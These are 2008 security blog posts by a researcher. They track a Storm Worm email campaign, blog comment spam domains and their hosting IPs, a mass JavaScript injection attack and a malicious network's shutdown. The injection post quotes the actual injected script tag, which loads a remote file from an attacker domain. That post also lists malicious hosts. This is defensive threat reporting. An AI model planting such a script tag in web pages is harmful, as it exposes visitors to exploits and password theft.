March 31st, 2008 by Steven Adair
No jokes here - just a quick update on the ever exciting Storm Worm. It seems today it started out on an April Fool’s Day campaign aimed at infecting more systems. It’s still pointing you to infected machines by giving you a URL to an IP address. Right now the file names are “foolsday.exe“, “funny.exe“, and “kickme.exe“.
Click the thumb nail below for a larger view of what the full website looks like:
Nothing too fancy this time around again and it seems they’re a little late in their delivery. Normally they start a little earlier. Anyway, just be on the look out and don’t infect yourself accidentally.
Posted in Spam, Storm Worm | No Comments »
March 16th, 2008 by Steven Adair
I have written a blog or two in the past about comment spam to the blog. However, after having more time and a larger sampling, I can easily tell you 13 domains that are nearly the bane of my comment area’s existence. There is a set of 13 domains that all belong to the same individual or group that continually bombard my blogs with comment spam. They have been doing this for about 6 months now and always use different IP addresses. The following domain names are always used:
airline333tickets.com
airline379tickets.com
cialis-l-pills.com
cialis-gl-pills.com
new-music-mp3.com
payday333loans.com
payday-gl-loans.com
phentermine-gl-pills.com
phentermine-1-pills.com
viagra-77-pills.com
viagra-gl-pills.com
xanax777pills.com
xanax-gl-pills.com
What is even more interesting is that these guys also easily get past my comment spam honey pot. They haven’t ever been caught by it. My comment spam has been reduced by 80% or so, as I now receive a couple new spams a day that aren’t caught by the comment spam honey pot. These, however, make it right through each time. It seems that all of these domain names involved are hosted on one of the following three IP addresses (at least right now):
72.9.109.250
72.9.109.251
72.9.109.253
These are all under a hosting provider at Ezzi.net. No idea if these are legitimately paid for boxes or compromised. I do not have evidence one way or another. I just know it’s really shady to spam so heavily from so many different IP addresses. 
Just doing a Google search on a few of these domains like “airline333tickets.com” and “xanax7777pills.com” reveals over 65,000 search results. It would seem I am not the only one being heavily spammed by these guys. They’ve left hundred of blog comment spams in my queue. Here is an example one from earlier today:
—–
alumnimb | triath@Ced.com | phentermine-1-pills.com | IP: 68.185.223.151
How do you do…
Good stuff, very nicely done.
Good stuff, very nicely done!
http://viagra-77-pills.com/discount__viagra.html
http://viagra-77-pills.com/cheap–viagra.html
I simply mad about this forum!
There was merrily!
Like! Thank you!
The Author, you - super hero!
http://airline333tickets.com/allegiant_airline_tickets.html
http://cialis-l-pills.com/cialis_10_levitra.html
http://xanax777pills.com/order_10_xanax.htm
I am glad to find this forum !
Excellent forum, added to favorites!
http://phentermine-gl-pills.com/phentermine-9-online.html
http://cialis-l-pills.com/cialis_online.html
Thank you! I delighted!
Pretty nice forum, wants to see much more on it!
I Will be back!
Mar 16, 9:14 AM
—–
As we can see, our comments make superior use of the English language and link us to littering of exciting domains to visit. For what it’s worth, all of the domains are registered with either PUBLICDOMAINRESGISTRY.COM or ESTDOMAINS.
Posted in Spam | No Comments »
March 15th, 2008 by Steven Adair
Hello all that find this page. I’d like to see if I could at least try and clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days on two completely different attacks that some how end being linked together. We will look at both issues, describe them, and show how these attacks are not the same.
Chinese JavaScript Injection Attack
Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:
<script src=http://www.2117966.net/fuckjp.js></script>
This JavaScript would attempt to do several things and load other files that would attempt to exploit the visitor. With this attack there are *NO* iframe tags involved. Just take a look at the above line of code and is exactly what was injected. This is almost indentical to the “uc8010.com” attacks a few months ago. In fact, we were able to find a few pages that appear to have had the line of code above injected right into the middle of where it used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you get malware from the latest go around of these attacks, they will being stealing your passwords that you send with Internet Explorer.
An interesting side note worth mention is that Trend Micro’s own website was hit with this attack. They had several pages that can still be viewed in Google’s cache that were injected with the above script. It just goes to show this kind of unfortunate stuff can happen to anyone.
IFrame Injection Attack
The other attack that is getting a lot of attention is one that’s labeled an IFrame injection attack. However, in these instance the websites themselves are NOT actually hacked. Rather there is a lack of input validation and the attackers are able to cache search results involving links to malicious websites through an IFrame. In theory they could have just as easily put a JavaScript reference. It just happens they used an IFrame in their search terms that get cached. The websites themselves have not been compromised (i.e. if you just legitimately browsed on the website, you would not find yourself under attack). It appears some of them are attempting to exploit vulnerabilities in the user’s system and others are presenting them with fake errors about needing video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for a lot or most of this stuff. You can read some more information and see examples of this at http://ddanchev.blogspot.com/.
Conclusion
As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.
Steven
Posted in Malware, Exploits | No Comments »
March 14th, 2008 by Steven Adair
There have been another round of websites being attacked and having malicious JavaScript links placed into them. This will cause visitors to legitimate websites have been hacked to attempt to load a malicious JavaScript file from a Chinese website. The website 2117966.net (125.46.105.224) should be blocked or monitored for where possible! Please do not visit this website. The JavaScript will load other files and make attempt to exploit several vulnerabilities and compromise the end user. If a compromise is successful a password stealer will be loaded on the system. The program will attempt to send keylogged data to another server in China at the IP address 61.188.39.175.
Please be a look out for these websites and IPs on your network. You can read the full blog and links to other sites reporting this issue at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313
Posted in Malware, Exploits | No Comments »
March 8th, 2008 by Steven Adair
Apparently CNN recently interviewed some hackers from China and posted a story about it on the website here. It looks like they claimed to have hacked into to many sensitives sites to include that of the Pentagon. The article is interesting although it’s very light on verifiable facts — as the article mentions. Slashdot also just had a recent posting that’s closely related to this and even links to the article. It’s all fairly interesting, but people still don’t seem to understand that these machines you can get to from the Internet do not (or at least should not) have any classified information on them. This is not to say there is not sensitive information that they may have gotten, but I doubt the Chinese are going to suddenly know our battle plans or copy our technology as a result.
Posted in Random | No Comments »
March 4th, 2008 by Steven Adair
Well, it looks like there might be good news regarding Abdallah_Internet Hizmetleri, a group that owned a few IP ranges on TurkTelekom. It appears they might no longer be operational. As of late last night or early today, all routes going to 88.255.90.0/24 and 88.255.94.0/24 appear to have gone dead. Part of the WHOIS record now reads as follows:
person: Mahmod AbdAllah el Gashmi
address: SISTEMNET TELEKOM BLACKLISTED PERSON
e-mail: admin@sistemnet.com.tr
phone: +902122666060
remarks: ——————————————————
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: For Abuse Contact : abuse@sistemnet.com.tr
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: SISTEMNET TELEKOM BLACKLISTED PERSON
remarks: ——————————————————
This is pretty good news as we have previously blogged about these IP ranges here. One of my Shadowserver colleagues also just recently published a whitepaper about AbdAllah Internet Hizmetleri. It would be awesome if this is what ultimately pulled the plug. You can read the whitepaper entitled “RBN Rizing” at whitepapers section on the Shadowserver website at whitepapers section or view it directly by going to RBN Rizing document itself. Happy reading and good riddance (?) to AbdAlllah_Internet! 
Posted in Malware, Exploits, RBN, Random | No Comments »
